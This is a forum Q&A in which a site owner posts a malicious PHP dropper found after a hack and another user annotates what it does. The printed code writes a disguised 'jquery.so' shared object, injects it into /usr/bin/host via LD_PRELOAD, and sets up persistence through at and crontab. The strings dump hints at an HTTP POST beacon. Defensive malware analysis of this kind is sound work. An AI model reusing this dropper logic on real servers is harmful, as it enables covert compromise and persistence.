Dylan H Dylan H - 4 months ago 10
PHP Question

I have been hacked, now I have a weird PHP file. What is it doing?

So I have been hacked a while ago and now I have a weird PHP file in my file manager. This is the content of it:

<?php
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('file_put_contents')) {
function file_put_contents($filename, $data) {
$f = @fopen($filename, 'w');
if (! $f)
return false;
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
$arch = 32;
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
$n = unpack("C*", fread($f, 8));
$so[7] = sprintf("%c", $n[8]);
fclose($f);
}
$n = file_put_contents("./jquery.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
@chmod("1.sh", 0777);
@system("at now -f 1.sh", $ret);
if ($ret == 0) {
for ($i = 0; $i < 5; $i++) {
if (! @file_exists("1.sh")) {
print "AT success\n";
exit(0);
}
sleep(1);
}
}
@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
for ($i = 0; $i < 62; $i++) {
if (! @file_exists("1.sh")) {
print "CRONTAB success\n";
exit(0);
}
sleep(1);
}
}
@system("./1.sh");
@unlink("1.sh");
?>


Ofcourse, I delete it. But what did it? Are there more files infected?

I understand that it is checking if the system is a 32bit system or 64bit, then it creates 1.sh and executes it but what then?

Full code: http://pastebin.com/hejkuQtV

Answer

I tried to analyze the code. Have a look at this and check my comments regarding the shell script "1.sh". In my opinion deleting the PHP script would not be sufficient.

<?php

//probably the attacker wants to check that the script works.
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";

//redefine file_put_contents if doesn't exist
if (! function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}

//kill all running instances of host command. "host" command is used for DNS lookups among other things.
@system("killall -9 ".basename("/usr/bin/host"));

//32 bit
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";

//64 bit
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;

//decide on the architecture based on the value of max int
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;

//the hex based on architecture. "so" probably contains a function() used by "host". The attacker is replacing it later before running "host" command.    
$so = $arch == 32 ? $so32 : $so64;

//read 8 bytes from "host" binary file, and unpack it as an unsigned char.
$f = fopen("/usr/bin/host", "rb");
if ($f) {

    //n is an array of unsigned chars. Each array item can be (0-255)
    $n = unpack("C*", fread($f, 8));

    //convert to ascii, and replace the 7th character in the string with a value obtained from "hosts" binary file.
    //This vale from "hosts" will be specific to current server/environment - set during compilation/installation. 
    //NOTE: The contents of "so" string, will be written to a new file "jquery.so".
    $so[7] = sprintf("%c", $n[8]);


    fclose($f);
}

//the shared object
$n = file_put_contents("./jquery.so", $so);

//The shared object "jquery.so" uses an environment variable named "AU". It's more clear later.
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];

//should give "host"
$HBN=basename("/usr/bin/host");

//current dir
$SCP=getcwd();


//Examining the following line, here's what it writes to 1.sh
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
    /*
    * #!/bin/sh
    * cd '/path/to/1.sh'
    * if [ -f './jquery.so' ];then 
    * killall -9 host;
    * export AU='MYSERVER.COM/THE/REQUEST/URI'  //this will be referenced in "jquery.so"
    * export LD_PRELOAD=./jquery.so //load the shared object before executing "host" command. THIS IS THE CORE OF THE ATTACK. Load the attacker's shared object(which contains his function, lets call it "xyz") before executing "host" command.
    * /usr/bin/host //execute. At that point, if "host" is making use of function "xyz", it would have been replaced by malicious "xyz" from "jquery.so" And since you don't know what the attacker function is actually doing, you should assume YOUR SYSTEM IS COMPROMISED.
    * unset LD_PRELOAD
    * crontab -l|grep -v '1\.sh'|grep -v crontab|crontab //not sure about this.
    * fi
    * rm 1.sh //remove
    * exit 0
    */


@chmod("1.sh", 0777);
@system("at now -f 1.sh", $ret); //execute 1.sh. It will be deleted once it's executed as per the "rm" statement.
if ($ret == 0) {

    //try for 5 seconds until the file is deleted (hence executed). If so, then all good.
    for ($i = 0; $i < 5; $i++) { 
        if (! @file_exists("1.sh")) {
            print "AT success\n";
            exit(0);
        }
        sleep(1);
    }
}

//another attempt to execute the file in case the above failed.
@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {

    //keep trying for 60 seconds until the file is deleted (as per the crontab setup.)
    for ($i = 0; $i < 62; $i++) {
        if (! @file_exists("1.sh")) {
            print "CRONTAB success\n";
            exit(0);
        }
        sleep(1);
    }
}

//the last resort if the previous execute attempts didn't work.
@system("./1.sh");
@unlink("1.sh");
?>

Here's a little more info. First, we can use this code to generate the ".so" file.

<?php
    //build the attack string (this contains the hex representation of the attacker complied/linked program)
    $so32="\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00.....";

    //print it. This will output the binary
    echo $so32;
?>

//run
php hack.php > jquery.so

At this point, we have the same shared object that the attacker loaded before running "host". Using "strings" command:

$ strings ./jquery.so
Output:
    write
    unlink
    pthread_mutex_lock
    pthread_mutex_unlock
    gettimeofday
    free
    realloc
    strdup
    read
    getaddrinfo
    freeaddrinfo
    socket
    setsockopt
    connect
    malloc
    mmap
    munmap
    usleep
    strcmp
    dlclose
    pthread_join
    __errno_location
    strncmp
    sprintf
    strcpy
    time
    vsnprintf
    strcat
    strstr
    atoi
    strchr
    dlopen
    dlsym
    pthread_create
    srandom
    lseek
    ftruncate
    umask
    setsid
    chroot
    _exit
    signal
    fork
    dladdr
    realpath
    getpid
    execl
    wait
    getsockname
    getenv
    geteuid
    unsetenv
    popen
    fgets
    fclose
    QQRW
    1c2#N
    v[uq
    M!k(q.%
    jc[Sj
    F,%s,%x
    R,%d,%d,%d,%s,%s,
    P,%u,%u,%u,%u,%u
    POST %s HTTP/1.0
    Host: %s
    Pragma: 1337
    Content-Length: %d
    core
    %s/%s
    |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
    /dev/null
    %s/%c.%d
    (null)
    ROOT
    LD_PRELOAD
    /usr/bin/uname -a
    /tmp

As you can see, his hack seems to be using lots of functions including him doing a POST request somewhere. It's not possible of course to figure it out from the above but gives you some clue.

If you want to take this further, you can look into and ELF decompiler. But I doubt that you will be able to reach anything conclusive. I am not an expert, but my advise is to keep on monitoring your network activity for anything out of the ordinary.

The "file" command gives you a bit of information about the file - hence ELF decomplier.

$ file ./jquery..so
Output:
    ./jquery.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped